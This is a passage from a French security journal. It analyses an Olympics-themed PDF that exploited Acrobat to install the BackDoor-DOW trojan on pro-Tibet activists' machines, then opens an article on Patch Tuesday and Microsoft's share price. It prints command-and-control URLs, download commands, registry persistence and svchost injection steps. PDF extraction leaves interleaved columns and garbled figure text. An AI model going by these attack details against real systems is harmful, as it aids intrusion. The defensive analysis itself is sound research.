Troie ou des outils antispyware gratuits, souvent eux-mêmes
des programmes malveillants
t Evénements majeurs, tels que compétitions sportives,
catastrophes climatiques ou actualité brûlante
t Mention de célébrités et potins les concernant
t Relations secrètes ou considérées comme fiables, notamment
l'abonnement à des sites de réseau social, faux amis, anciens
camarades de classe, membres de la famille et amants secrets
La liste des sujets potentiels est pratiquement illimitée, et tous
sont très attirants pour un grand nombre d'utilisateurs aux quatre
coins du monde. A la lumière de la liste, on constate également
que l'ingénierie sociale peut souvent prendre pour cible des
groupes d'utilisateurs au niveau local ou national. Ainsi, une
attaque d'envergure mondiale lancée contre un site de réseau
social connu touchera un public international. En revanche, une
attaque similaire concernant l'élection présidentielle américaine
fera des victimes majoritairement américaines.
Pourquoi les Jeux Olympiques ?
Depuis des mois, la Chine est sous les projecteurs en raison
des Jeux Olympiques 2008 de Pékin. Athlètes, supporters,
infrastructure, environnement et politique, entre autres, ont été Le choix des Jeux Olympiques comme thème
longtemps au centre de l'actualité.
d'attaque d'ingénierie sociale a permis aux
Sur le front politique, les protestations en faveur du Tibet
auteurs de logiciels malveillants de prendre pour
ont constitué un sujet extrêmement sensible. De nombreuses
organisations opposées à l'occupation chinoise du Tibet ont cible de nombreux passionnés de sports ainsi que
bénéficié de la couverture médiatique des Jeux Olympiques.
les personnes précédemment visées en raison de
D'autres questions touchant au travail forcé et aux droits de
l'homme ont également été largement débattues sur la place leur intérêt dans le conflit sino-tibétain.
publique. Cette actualité brûlante a motivé de nombreux
internautes à lire la presse en ligne.
Dans la période précédant les Jeux, la flamme olympique est
devenue un symbole important dans les manifestations de A ce stade, le public visé par l'attaque s'est élargi. Initialement
protestation. Le parcours de la flamme a été largement couvert dirigée contre des organisations ciblées et leurs sympathisants,
par les médias et suscité de vives réactions parmi ses partisans l'attaque s'est étendue à tous les internautes intéressés par la
et opposants. Un tel intérêt constitue évidemment une aubaine situation tibétaine. Une fois encore, l'attention des médias a
pour les auteurs de logiciels malveillants, puisqu'il accroît le contribué à élargir la population de victimes potentielles.
nombre de victimes potentielles attirées par le sujet.
Ensuite, les auteurs de logiciels malveillants ont exploité les Jeux
Olympiques eux-mêmes pour lancer des attaques d'ingénierie
Echantillonnage des victimes sociale sous la forme du rootkit pro-Tibet2. Cette série de fichiers
malveillants se dissimulait derrière une vidéo tournant en ridicule
Une attaque d'ingénierie sociale doit généralement
un gymnaste chinois. Pendant l'exécution du dessin animé,
« échantillonner » au préalable ses victimes pour réussir. Examinons
plusieurs fichiers malveillants étaient silencieusement injectés et
à présent les victimes potentielles d'une attaque utilisant le conflit
un rootkit installé sur l'ordinateur cible afin de les dissimuler.
sino-tibétain ou les Jeux Olympiques comme appât.
Le choix des Jeux Olympiques comme thème d'attaque
Des militants appartenant à des groupes protibétains ont
d'ingénierie sociale a permis aux auteurs de logiciels malveillants
reçu des e-mails contenant une pièce jointe au format CHM
de prendre pour cible de nombreux passionnés de sports ainsi
(fichier d'aide compilé), PDF, PPT, XLS ou DOC traitant de la
que les personnes précédemment visées en raison de leur intérêt
situation au Tibet, de la Chine en général ou des Jeux. Tous ces
dans le conflit sino-tibétain.
messages semblaient avoir été envoyés par une personne ou une
organisation digne de confiance. Selon toute vraisemblance, ces
utilisateurs étaient habitués à recevoir des documents de ce type
de leurs partisans et ne s'en sont pas toujours méfiés. Il s'agissait
de pièces jointes malveillantes : leurs auteurs utilisaient diverses
vulnérabilités associées aux fichiers d'aide compilés HTML de
Microsoft, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint
ou Microsoft Word pour injecter et exécuter silencieusement
des fichiers exécutables incorporés. A ce stade, le public cible
était relativement restreint, mais la couverture médiatique des
manifestations en faveur du Tibet a servi de détonateur.
Par la suite, certains sites web légitimes de défense de la cause
tibétaine ont été piratés afin d'incorporer le cheval de Troie
Fribet1, qui peut se télécharger sur les ordinateurs des visiteurs en
exploitant des vulnérabilités des navigateurs web.

AUTOMNE 2008 17
Etude de cas : attaque de logiciel
malveillant sur fond de Jeux Olympiques
Nous avons récemment reçu le fichier PDF, declaration_olympic_
games_eng.pdf, envoyé initialement à un groupe pro-tibétain
(voir figure 1). Ce document semblait inoffensif dans la mesure
où, à l'ouverture de l'application, le texte apparaissait sans bloquer
l'application ni provoquer d'événements inhabituels. La plupart
des utilisateurs n'ont dès lors pas suspecté la présence d'une
quelconque activité malveillante. Toutefois, en arrière-plan, certains
fichiers malveillants étaient silencieusement créés sur les ordinateurs
des victimes. Examinons à présent le fonctionnement de l'attaque.
En fait, le fichier declaration_olympic_games_eng.pdf est un
fichier PDF vide qui exploite une vulnérabilité d'Acrobat pour
injecter et exécuter la première partie d'un package malveillant.
Ce fichier exécutable malveillant (détecté sous le nom de
BackDoor-DOW3) est incorporé sous une forme chiffrée à
l'emplacement illustré dans l'éditeur hexadécimal de la
figure 2 (page suivante).
La figure 3 (page suivante) montre les premiers octets du fichier
incorporé après qu'il a été déchiffré.
actifs, localise le répertoire d'installation d'Acrobat puis ouvre
le fichier book.pdf. La figure 4 (page suivante) montre le code
contenu dans le fichier injecteur responsable de l'action.
Le logiciel malveillant injecte également un autre fichier
exécutable, book.exe, qui se copie sous %ALLUSERSPROFILE%\
Application Data\msmsgs.exe et crée un nouveau service
Windows4. Ce nouveau service porte le nom de « Logical Disk
Manager Service » (Service du gestionnaire de disques logiques)
et garantit l'exécution automatique du cheval de Troie au
démarrage de Windows.
Le logiciel malveillant dispose même d'un « plan de secours »
pour intercepter le processus de démarrage : s'il n'arrive pas
à créer le service, il ajoute une nouvelle entrée de Registre,
Windows Media Player, qui pointe vers msmsgs.exe. Windows
Media Player est ajouté à la clé de démarrage suivante dans
le Registre5 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run. Le cheval de Troie crée également
deux fichiers contenant certaines données chiffrées :
t C:\WINDOWS\jwiev.log.bak
t C:\WINDOWS\clocks.avi.bak

Le fichier exécutable dépose le fichier PDF légitime, book.pdf, qui

s'affiche lors de l'exécution du premier fichier. Le fichier injecteur
recherche le processus AcroRd32.exe dans la liste des processus

Figure 1 : Les sympathisants de

la cause tibétaine ont récemment
Sponsor's declaration of responsibility
reçu ce fichier en apparence
at the 2008 Beijing Olympic Games
légitime sous la forme d'une
WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, pièce jointe à un e-mail.
the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares:
:HUHDI¿UPRXUFRPPLWPHQWWRWKH³KDUPRQLRXVGHYHORSPHQWRIPDQZLWKDYLHZWR
SURPRWLQJDSHDFHIXOVRFLHW\FRQFHUQHGZLWKWKHSUHVHUYDWLRQRIKXPDQGLJQLW\´DVVHW
forth in the Olympic Charter, and
We acknowledge that sponsorship of the Olympic Games carries certain responsibilities,
including the responsibility of implementing our sponsorship and communications
programs in a manner that promotes awareness of basic human rights such as the
right to free speech, and
:HDUHIXOO\DZDUHRIWKHDVVXUDQFHPDGHE\WKHJRYHUQPHQWRIWKH3HRSOH
V5HSXEOLF
RI&KLQDWRWKH2O\PSLF&RPPLWWHHWRLPSURYHLWVKXPDQULJKWVUHFRUGDVDFRQGLWLRQ
for hosting the Olympic Games and recognize the worldwid concerns expressed about
&KLQD
VKXPDQULJKWVUHFRUG
IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to
human rights at the 2008 Beijing Olympics by:
),567PDNLQJERQD¿GHJRRGIDLWKHIIRUWVWRUDLVHWKHLVVXHRIKXPDQULJKWVZLWKRXU
Chinese contacts and to publicly report on our efforts to do so, and
6(&21'GHVLJQDWLQJDKLJKOHYHOH[HFXWLYHZLWKLQRXURUJDQL]DWLRQWRPRQLWRUHYHU\
DVSHFW RI RXU DFWLYLWLHV DVVRFLDWHG ZLWK WKH 2O\PSLFV DQG WR DVVXUH WKDW RXU DFWLRQV
SURSHUO\UHÀHFWRXUFRPPLWPHQWWRKXPDQGLJQLW\DQGKXPDQULJKWVDQG
THIRD, establishing a fund through which contributions can be made to prisoners of
conscience in China, and their families, as well as to those persecuted in connection
with the 2008 Olympic Games, and
)2857+SUHVHQWLQJDFRUSRUDWHUHVROXWLRQWRRXU%RDUGRI'LUHFWRUVUHVROYLQJWRDGRSW
this Declaration, and the principles of human rights and human dignity upon which it is
based, prior to the commencemento of the 2008 Olympic Games in Beijing, and
),)7+LQFRUSRUDWLQJWKLV'HFODUDWLRQRI5HVSRQVLELOLW\LQWRRXUFRPPHUFLDOPHVVDJHV
DECLARED BY

Name/Title
Date

18 McAFEE SECURITY JOURNAL

Pour terminer, book.exe effectue un nettoyage en créant
un fichier de commandes qui se supprime et s'arrête
automatiquement. A ce stade, c'est le fichier msmsgs.exe qui
prend les commandes.
Msmsgs.exe injecte temporairement un autre fichier à
l'emplacement suivant : C:\Program Files\WindowsUpdate\
Windows Installer.exe. Juste avant d'être supprimé, Windows
Installer.exe injecte deux copies d'un fichier DLL dans :
t C:\Documents and Settings\All Users\DRM\drmv021.lic
t C:\Documents and Settings\All Users\DRM\avp01.lic
Le logiciel malveillant s'injecte dans svchost.exe pour dissimuler
son activité. Il exécute une nouvelle instance de svchost.exe (le
processus système légitime6), alloue un bloc de mémoire dans
l'espace d'adressage de ce nouveau processus, écrit une copie
de lui-même dans l'espace d'adressage virtuel de svchost.exe (à
l'adresse 0x400000), et exécute le code malveillant en créant
une thread distante.
Figure 2 : Ce fichier PDF malveillant contenait une copie chiffrée du
logiciel malveillant BackDoor-DOW.
Figure 3 : Version déchiffrée du cheval de Troie BackDoor-DOW.
Le code malveillant injecté dans svchost.exe appelle la fonction
workFunc() à partir du fichier avp01.lic, laquelle se connecte à un
serveur distant et envoie trois requêtes :
t http://www1.palms[supprimé]/ld/v2/loginv2.asp?hi=2wsdf351&x
=0720080510150323662070000000&y=192.168.1.122&t1=ne
t http://www1.palms[supprimé]/ld/v2/votev2.asp?a=7351ws2&s
=0720080510150323662070000000&t1=ne
t http://www1.palms[supprimé]/ld/v2/logoutv2.asp?p=s9wlf1&s=
0720080510150323662070000000&t1=ne
Les paramètres x et y peuvent varier. La valeur de x est obtenue
en concaténant « 07 » ainsi que la date (10/05/2008) et l'heure
(15:03:23) exactes de création du fichier clocks.avi.bak puis en
ajoutant la chaîne codée en dur « 662070000000 ». La valeur de
y est l'adresse IP de l'ordinateur de la victime.
Figure 4 : Le logiciel malveillant recherche Acrobat Reader
(AcroRd32.exe) puis ouvre le fichier innocent book.pdf.
AUTOMNE 2008 19

Les trois scripts côté serveur loginv2.asp, votev2.asp et
logoutv2.asp informent l'auteur de l'attaque qu'un nouvel
ordinateur compromis est disponible afin de vérifier si
une commande a été envoyée par le pirate ou d'arrêter le
composant Backdoor. Pour lire la réponse envoyée après la
connexion à l'un des scripts côté serveur, le cheval de Troie crée
une copie de la page web renvoyée dans le dossier suivant :
C:\Program Files\InstallShield Installation Information\
Le nom du fichier représente une valeur aléatoire de six
chiffres et, une fois lu, le fichier est supprimé. loginv2.asp et
logoutv2.asp renvoient uniquement des pages web vides (avec
des balises <html><head></head></html>). En revanche,
votev2.asp renvoie soit du code signifiant approximativement
« Le composant backdoor est prêt mais aucune action n'est
nécessaire pour le moment » (@n4@300@), soit une commande
similaire aux exemples suivants :
t @n11@http://www1.palms[supprimé]/ld/v2/sy64.
jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d
302f7a58aeb1@
t @n11@http://www1.palms[supprimé]/ld/v2/200764.jpg @%
SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f
fd48c@.
Les deux commandes signifient approximativement « télécharger
le fichier susmentionné avec l'extension .JPG et l'injecter dans le
dossier %SysDir% de l'ordinateur de la victime à l'aide du nom
du fichier exécutable fourni ». La dernière partie de la réponse est
le hachage md5 du fichier en passe d'être téléchargé (et utilisé
pour contrôler l'intégrité du fichier).
Tout au long du processus, les victimes ne se doutent pas un seul
instant de ce qui se passe en arrière-plan. Pendant qu'ils lisent et
complètent la déclaration envoyée par le fichier PDF malveillant,
le composant backdoor est installé silencieusement sur leur
ordinateur, dans l'attente des commandes qui seront envoyées
par le pirate. A ce stade, il est possible de télécharger n'importe
quel autre fichier malveillant sur l'ordinateur, dans la mesure où il
est entièrement compromis.
20 McAFEE SECURITY JOURNAL
Cette tendance risque de prendre de
l'ampleur au cours des mois à venir.
Elle est inquiétante car la plupart
des internautes font confiance aux
éditeurs de logiciels de sécurité. Si cette
confiance était entamée, les dommages
seraient sans doute encore plus graves.
Sites et logiciels malveillants
Les accroches dont usent les auteurs d'attaques d'ingénierie
sociale ne se limitent pas aux événements sportifs. Depuis plusieurs
mois, nous avons pu constater une augmentation des logiciels
malveillants prétendument développés par des éditeurs de logiciels
de sécurité. Ces programmes trompent les victimes en prétendant
les aider. Comble de l'ironie, plusieurs variantes du cheval de Troie
FakeAlert7 avertissent les victimes que leur ordinateur a été infecté
et communiquent des informations (souvent des URL malveillantes)
permettant de télécharger des outils « antispyware » qui sont en
réalité des applications malveillantes.
Etant donné l'importance que revêtent les mises à jour des
logiciels, il n'a pas fallu longtemps pour que des sites web
malveillants commencent à imiter le site Windows Update légitime.
Une méthode très élaborée utilisant des composants DLL a été
récemment découverte. Liée à un pseudo-site Windows Update,
elle empêchait Internet Explorer d'avertir les utilisateurs lorsqu'un
serveur web distant utilisait un certificat non valide pour un site
web sécurisé (HTTPS). Cette attaque avait pour but de dissimuler
des fichiers malveillants sous le couvert de mises à jour Windows
qui étaient téléchargées et exécutées par les victimes.
Cette tendance risque de prendre de l'ampleur au cours des mois
à venir. Elle est inquiétante car la plupart des internautes font
confiance aux éditeurs de logiciels de sécurité. Si cette confiance
était entamée, les dommages seraient sans doute encore plus graves.
Conclusion
Les événements sportifs sont souvent utilisés comme appâts
dans les attaques d'ingénierie sociale. Il était dès lors prévisible
que les développeurs de logiciels malveillants s'intéressent aux
Jeux Olympiques de Pékin. Cet événement réunissait tous les
ingrédients nécessaires à leur succès : des petites attaques ciblées
ont pris de l'ampleur à mesure qu'augmentait le nombre de
victimes potentielles intéressées par le sujet. L'expansion a été
facilitée par les questions connexes : le problème du Tibet a
conduit au relais de la flamme qui a, à son tour, mené aux Jeux
eux-mêmes. Les médias jouent souvent un rôle majeur dans la
popularité d'un événement. La couverture médiatique importante
incite certaines victimes à aller au-devant de l'information ; ce
faisant, elles tombent sur des sites web malveillants ou, plus
fréquemment, des sites web légitimes compromis qui infectent
silencieusement leurs visiteurs peu méfiants.
NOTES
1 Fribet, McAfee VIL — http://vil.nai.com/vil/content/v_144356.htm
2 « Is Malware Writing the Next Olympic Event? » (Le développement de logiciels
malveillants est-il le prochain événement olympique ?) Blog McAfee Avert Labs
— http://www.avertlabs.com/research/blog/index.php/2008/04/14/
is-malware-writing-the-next-olympic-event/
3 « BackDoor-DOW », McAfee VIL — http://vil.nai.com/vil/content/v_144476.htm
4 « Services », Microsoft Developer Network — http://msdn.microsoft.com/en-us/
library/ms685141(VS.85).aspx
5 « Registre », Microsoft Developer Network — http://msdn.microsoft.com/en-us/
library/ms724871(VS.85).aspx
6 « Description de Svchost.exe dans Windows XP », Microsoft Help and Support
— http://support.microsoft.com/kb/314056/en-us
Ces attaques sont tellement évoluées que les victimes n'ont
pratiquement jamais aucun soupçon. Comme l'a montré cette
étude de cas, nous sommes confrontés à des menaces émanant non
seulement d'expéditeurs inconnus et de pièces jointes dotées d'une
extension .EXE, mais aussi de documents légitimes (Microsoft Word,
Microsoft Excel, Microsoft PowerPoint, etc.) qui peuvent également
héberger un composant malveillant. Le succès de ces attaques est
dû en partie à Ia conception erronée voulant que les fichiers de
données ne peuvent pas contenir de logiciels malveillants.
Certes, les internautes sont généralement plus conscients et
mieux informés des ruses habituelles des pirates. Ces derniers se
trouvent ainsi contraints à se tourner vers des techniques plus
créatives et plus délétères pour réussir à tromper leurs victimes.
Elodie Grandjean travaille comme chercheur pour
McAfee Avert Labs en France depuis janvier 2005.
Elle possède plus de cinq années d'expérience
dans le domaine de l'ingénierie inverse sur les
plates-formes Windows. Spécialisée dans les
techniques de protection contre l'ingénierie inverse,
la décompression et le déchiffrement, Elodie
Grandjean a également écrit pour le magazine
français de sécurité informatique MISC (Multi-
System & Internet Security Cookbook). Lorsqu'elle
ne se consacre pas à l'analyse des logiciels
malveillants ou à la programmation, elle surfe sur
Internet, ou elle aime assister à des concerts ou
savourer une bière belge entre amis.
7 FakeAlert-B, McAfee VIL — http://vil.nai.com/vil/content/v_139058.htm
FakeAlert-C — http://vil.nai.com/vil/content/v_139219.htm
FakeAlert-D — http://vil.nai.com/vil/content/v_140346.htm
FakeAlert-D!56c05f7f — http://vil.nai.com/vil/content/v_142850.htm
FakeAlert-H — http://vil.nai.com/vil/content/v_141377.htm
FakeAlert-I — http://vil.nai.com/vil/content/v_141466.htm
FakeAlert-G — http://vil.nai.com/vil/content/v_141163.htm
FakeAlert-M — http://vil.nai.com/vil/content/v_142807.htm
FakeAlert-Q — http://vil.nai.com/vil/content/v_143088.htm
FakeAlert-R — http://vil.nai.com/vil/content/v_143102.htm
FakeAlert-S.dll — http://vil.nai.com/vil/content/v_143110.htm
FakeAlert-T — http://vil.nai.com/vil/content/v_143406.htm
Generic FakeAlert.a — http://vil.nai.com/vil/content/v_143470.htm
AUTOMNE 2008 21
Les vulnérabilités des
marchés boursiers
Anthony Bettini
La récente crise des crédits qui a secoué les marchés des actions et des produits dérivés a
attiré l'attention sur les nombreuses facettes du secteur financier autres que les structures
de contrôle réglementaire, les agences de notation financière, les fonds spéculatifs, le
capital d'investissement, les fonds de pension et d'autres teneurs de marché.
En raison de cette attention médiatique constante, les spécialistes
des sciences connexes (informatique, bioinformatique, etc.)
commencent à s'intéresser de plus près à l'ingénierie financière.
Etant donné notre expérience dans le domaine de la recherche
de vulnérabilités et le battage médiatique autour de la crise des
crédits, il est normal de se pencher sur les vulnérabilités des
marchés des actions et des produits dérivés. Lors de la conférence
Black Hat 2007 aux Etats-Unis, Matasano Security s'est intéressé
au protocole FIX (Financial Information eXchange), sur lequel
repose le transfert des messages entre les gestionnaires de
portefeuille exécutant des ordres pour le compte de leurs clients et
les opérateurs en bourse1,2. Les recherches de Matasano portent
sur diverses questions dont les éventuelles vulnérabilités du
protocole FIX. S'il s'agit d'une approche intéressante sur les points
faibles des protocoles financiers en termes de sécurité, notre article
adopte, quant à lui, une démarche différente. Il s'attache plutôt à
l'aspect financier et à l'ingénierie sociale qu'aux vulnérabilités.
Notre recherche s'intéresse aux questions suivantes :
t Quelles sont les implications sur le cours de l'action de la
publication mensuelle des correctifs Microsoft (Patch Tuesday) ?
t Qu'en est-il du jour qui précède cette publication ?
t Et du jour qui suit celle-ci (parfois désigné en anglais par le
terme « Exploit Wednesday ») ?
t Que se passe-t-il le jour de la publication des bulletins
Microsoft Security Bulletin Advance Notification ?
t Qu'en est-il des menaces émergentes ?
t Les investisseurs sont-ils même conscients de ces événements ?
t Existe-t-il actuellement des événements d'ingénierie sociale
liés aux vulnérabilités et aux marchés des actions ? Des
événements de ce type pourraient-ils se multiplier à l'avenir ?
22 McAFEE SECURITY JOURNAL
Comme il s'agit d'un sujet d'étude très large, commençons par
analyser uniquement les vulnérabilités des produits Microsoft. Dans
un proche avenir, nous prévoyons de compléter nos recherches
en y incluant des données relatives à d'autres éditeurs de logiciels,
ainsi qu'une étude comparative sur l'impact économique des
méthodes de distribution de correctifs (par exemple la publication
mensuelle de Microsoft, la publication trimestrielle d'Oracle et les
publications en fonction des besoins d'autres éditeurs).
L'hypothèse
Le jour de diffusion des correctifs mensuels est le deuxième mardi
de chaque mois (d'où le surnom de « Patch Tuesday »). C'est le
seul jour du mois où Microsoft publie principalement les mises
à jour fonctionnelles et les mises à jour de sécurité de Windows
et de ses autres applications. Selon notre hypothèse, en ce jour
précis, il existe une pression à la baisse sur l'action Microsoft
(sigle de l'action : MSFT). Cette pression est vraisemblablement
due à des communiqués de presse concernant les répercussions
négatives des vulnérabilités de sécurité présentes dans les
logiciels Microsoft. De la même façon, le cours a tendance à
remonter le lendemain, le mercredi, lorsque les investisseurs
réalisent que l'action a été survendue la veille.
Le jour de diffusion des correctifs fait-il l'objet d'une
certaine forme de spéculation ?
Tout porte à le croire. En tout cas, il semble y avoir une
corrélation entre les fluctuations du cours de l'action et le cycle
de distribution des correctifs. A titre d'exemple, reportons-nous à
la figure 1 (page suivante).
La première ligne, « Moyenne de l'année », représente notre
moyenne de référence de la différence entre le cours de l'action
Microsoft à l'ouverture des marchés, et ce cours à la clôture. La
figure inclut une autre base de référence, à savoir la moyenne
des « jours sans événements », qui exclut donc des événements
tels que les jours de publication des correctifs mensuels et des
bulletins de notification avancée. Il semble que, lorsque Microsoft
publie un bulletin Security Bulletin Advance Notification, le
cours connaît en moyenne une tendance à la baisse plus forte
que d'habitude. De même, le jour de publication des correctifs
mensuels enregistre également une tendance à la baisse plus
marquée. Plus intéressant, le mercredi qui suit Patch Tuesday
(également appelé « Exploit Wednesday »), la tendance est
généralement haussière ou en tout cas positive à la clôture.
Cela s'explique probablement par le fait que les investisseurs
institutionnels ou les teneurs de marché estiment que l'action
a été survendue la veille en raison de mauvaises nouvelles alors
qu'en réalité, l'impact est négligeable sur la valeur de Microsoft
en tant qu'investissement. Notez que cette tendance se vérifie
régulièrement ces trois dernières années et toujours maintenant.
Bien que la fluctuation du cours entre l'ouverture et la clôture
soit la plus facile à comprendre, il est possible de noter cette
même tendance dans la moyenne entre le cours à l'ouverture et
le cours le plus élevé (cours du jour) et aussi dans la moyenne
entre le cours à l'ouverture et le cours le plus bas — même si,
dans certains cas, elle est moins marquée.
La figure 2 montre qu'en général, les cours moyens intrajournaliers
les plus élevés observés les jours de notification avancée et les
jours de publication des correctifs mensuels sont plus bas que le
cours moyen intrajournalier le plus élevé pour l'année. En outre,
le cours moyen le plus élevé intrajournalier le lendemain de la
publication mensuelle des correctifs est généralement plus élevé,
ce qui indique une pression à la hausse plus élevée.
La figure 3 nous apprend qu'en général, le cours moyen
intrajournalier le plus bas observé le jour de publication des
correctifs est plus bas que le cours moyen intrajournalier le
plus bas pour toute l'année. En revanche, en ce qui concerne
le jour de publication des bulletins de notification avancée, les
résultats sont plus mitigés. Il faut également noter que le cours
moyen intrajournalier le plus bas du jour qui suit Patch Tuesday
est généralement plus élevé que la moyenne de l'année, ce qui
indique une pression à la hausse plus élevée.

Fluctuation du cours de l'action Microsoft entre l'ouverture et la clôture Fluctuation de l'action Microsoft entre le cours d'ouverture et le cours
intrajournalier le plus bas
FLUCTUATION DU COURS DE L'ACTION FLUCTUATION DU COURS DE L'ACTION
MSFT ENTRE L'OUVERTURE ET LA 2008 2007 2006 MSFT ENTRE L'OUVERTURE ET 2008 2007 2006
CLÔTURE DES MARCHÉS LE COURS LE PLUS BAS
Moyenne de l'année -0,17 % 0,06 % 0,08 % Moyenne de l'année -1,35 % -0,89 % -0,64 %
Jours sans événements -0,20 % 0,07 % 0,08 % Jours sans événements -1,39 % -0,90 % -0,64 %
Publication des bulletins Microsoft
-0,43 % -0,12 % -0,08 % Publication des bulletins Microsoft -1,24 % -1,24 % -0,36 %
Security Bulletin Advance Notification
Security Bulletin Advance Notification
Jour de publication des correctifs Jour de publication des correctifs
-0,45 % -0,29 % -0,11 % -1,58 % -0,99 % -0,93 %
mensuels (Patch Tuesday) mensuels (Patch Tuesday)
Tous les mardis 0,16 % 0,05 % -0,03 % Tous les mardis -1,16 % -0,81 % -0,74 %

Tous les mardis sauf Patch Tuesday 0,37 % 0,15 % -0,01 % Tous les mardis sauf Patch Tuesday -1,01 % -0,76 % -0,68 %

Jour suivant Patch Tuesday 0,49 % 0,21 % 0,27 % Jour suivant Patch Tuesday -0,91 % -0,74 % -0,47 %
Tous les mercredis -0,18 % 0,44 % 0,29 % Tous les mercredis -1,39 % -0,78 % -0,51 %
Mercredi sauf celui qui suit Mercredi sauf celui qui suit
-0,40 % 0,51 % 0,26 % -1,56 % -0,79 % -0,54 %
Patch Tuesday Patch Tuesday

Figure 1 : L'analyse de la fluctuation du cours de l'action Microsoft les jours clés Figure 3 : Le jour de publication des correctifs mensuels conserve sa position de cours
montre une tendance régulière sur trois ans. le plus bas par rapport au cours intrajournalier moyen le plus bas de l'année.

Fluctuation de l'action Microsoft entre le cours d'ouverture et le cours

intrajournalier le plus élevé
FLUCTUATION DU COURS DE L'ACTION
MSFT ENTRE L'OUVERTURE ET 2008 2007 2006
LE COURS LE PLUS HAUT
Moyenne de l'année 1,28 % 0,97 % 0,88 %
Jours sans événements 1,34 % 0,95 % 0,88 %
Publication des bulletins Microsoft
Security Bulletin Advance Notification 0,93 % 1,08 % 0,58 %
Jour de publication des correctifs
mensuels (Patch Tuesday) 0,92 % 0,98 % 0,67 %

Tous les mardis 1,35 % 1,01 % 0,92 %

Tous les mardis sauf Patch Tuesday 1,50 % 1,02 % 0,99 %
Jour suivant Patch Tuesday 1,52 % 1,30 % 0,70 %
Tous les mercredis 1,25 % 1,24 % 0,92 %
Mercredi sauf celui qui suit
1,17 % 1,23 % 0,95 %
Patch Tuesday

Figure 2 : Dans les transactions intrajournalières, les jours de notification avancée et les
jours de publication des correctifs mensuels de Microsoft affichent systématiquement des
moyennes de cours de l'action moins élevées que les autres jours de l'année.
AUTOMNE 2008 23
Avant de poursuivre, un conseil de prudence à l'intention du
spéculateur sur séance occasionnel ou du petit investisseur : ces
fluctuations du cours sont relativement faibles et très limitées
dans le temps. Avec un tel profil d'investissement, réaliser un
bénéfice exigerait un gros investissement important et assez
risqué en capital. Qui plus est, l'ensemble de données illustré
ici est relativement restreint et donc inévitablement peu fiable.
Par exemple, une année compte environ 260 jours d'ouverture
des marchés, dont douze seulement correspondent aux jours de
publication des correctifs mensuels. Néanmoins, en dépit d'un
ensemble de données et de fluctuations limités, ce niveau de
corrélation peut s'avérer utile pour les investisseurs institutionnels,
même s'il doit être modélisé de la façon adéquate.
Examinons à présent les chiffres comparatifs des écarts de plus-
value potentiels de la figure 4.
Elle montre qu'il semble possible de réaliser une petite plus-value
en achetant des actions lorsque le cours s'approche de sa valeur
moyenne intrajournalière la plus basse le jour de la publication
des correctifs mensuels, et en les vendant le jour suivant, lorsque
la valeur de l'action correspond à la moyenne intrajournalière la
plus élevée. (L'effet serait naturellement atténué si cette pratique
devait se généraliser.)
Les écarts de plus-value illustrés ici sont basés sur de véritables
divulgations de vulnérabilités et sur l'hypothèse que les gens
réagissent de façon prévisible à de tels événements. De la même
façon que des rumeurs d'une OPA hostile peuvent se répercuter
sur le cours d'une action, des rumeurs concernant plusieurs
failles de sécurité graves et dangereuses pour les utilisateurs
risquent d'avoir le même effet.
Sachant qu'à l'heure actuelle, de fausses rumeurs et divulgations
de vulnérabilités circulent déjà via des listes de diffusion telles
que Full Disclosure ou dans les salles de chat IRC, on peut
envisager la possibilité d'orchestrer des événements de ce type
grâce à l'ingénierie sociale dans le but de manipuler le marché
et ses acteurs. Un tel scénario serait évidemment illégal, mais
certains font peu de cas de la loi lorsqu'il y a l'espoir d'un profit
à la clé. Par ailleurs, comme nous le verrons plus tard, toutes les
attaques n'auraient pas nécessairement recours à l'ingénierie
sociale. Certaines peuvent même être légales.
En tenant compte de l'hypothèse d'efficience des marchés
(EMH, Efficient Market Hypothesis) et de l'hypothèse de marche
aléatoire (RWH, Random Walk Hypothesis), il semble peu
probable qu'il existe des scénarios de plus-value basés sur des
prévisions à court terme du marché, et en tout cas qu'ils se
reproduisent régulièrement3,4. A cet égard, il convient d'attirer
l'attention des lecteurs sur le fait que « les performances passées
ne laissent rien présumer des performances futures5.
Rôle du volume des actions en tant qu'indicateur
Dans une autre théorie, nous soutenions que le cycle des jours
de publication des correctifs mensuels avait atténué l'impact
qu'une presse négative pouvait avoir à l'époque où la diffusion
des bulletins de sécurité n'était pas planifiée (avant la mi-
octobre 2003). Un rapide coup d'œil à l'indicateur du volume
d'actions semblent étayer cette théorie. (Reportez-vous à la
figure 5 pour plus de détails.)

Ecarts de plus-value potentiels

ÉCARTS 2008 2007 2006

Cours intra- Cours intra- Cours intra- Cours intra- Cours intra- Cours intra-
journalier journalier journalier journalier journalier journalier
le plus bas le plus haut le plus bas le plus haut le plus bas le plus haut
Entre le cours intrajournalier le plus bas de l'année
-1,35 % 1,28 % -0,89 % 0,97 % -0,64 % 0,88 %
et le cours intrajournalier le plus haut de l'année
Entre le cours intrajournalier le plus bas d'un jour Figure 4 : L'achat d'actions le
de publication des correctifs mensuels (Patch jour de publication des correctifs
Tuesday) et le cours journalier le plus haut -1,58 % 0,92 % -0,99 % 0,98 % -0,93 % 0,67 %
mensuels et leur vente le
d'un même jour
lendemain permet de réaliser un
Entre le cours intrajournalier le plus bas d'un jour de gain légitime, mais uniquement
publication des correctifs mensuels (Patch Tuesday) -1,58 % 1,52 % -0,99 % 1,30 % -0,93 % 0,70 % sur de gros volumes d'actions et
et le cours journalier le plus haut du jour suivant
avec un risque considérable.

24 McAFEE SECURITY JOURNAL

Volume de transactions sur l'action Microsoft, 2002– 2003

ÉCARTS DE VOLUME D'ACTIONS MSFT ECHANGÉES (PUBLICATIONS NON PLANIFIÉES) 2003 2002

Volume moyen, année complète (en actions échangées par jour) 65 074 644 76 903 678

Volume moyen, année complète (jours sans événements) 64 512 432 76 503 325
Figure 5 : Volume de
Volume moyen, jour d'un bulletin non planifié 70 017 743 78 796 255
transactions liées à l'action
Différence moyenne en volume 7,60 % 2,46 % Microsoft avant le passage à
la publication planifiée des
Ecart moyen en volume par rapport aux jours sans événements 8,53 % 3,00 %
correctifs mensuels

Jours de publication de correctifs mensuels

ÉCARTS DE VOLUME D'ACTIONS MSFT ECHANGÉES

(PUBLICATIONS PLANIFIÉES) 2008 2007 2006 2005 2004

Volume moyen, année complète 84 898 274 62 506 437 67 074 387 66 612 503 66 793 733

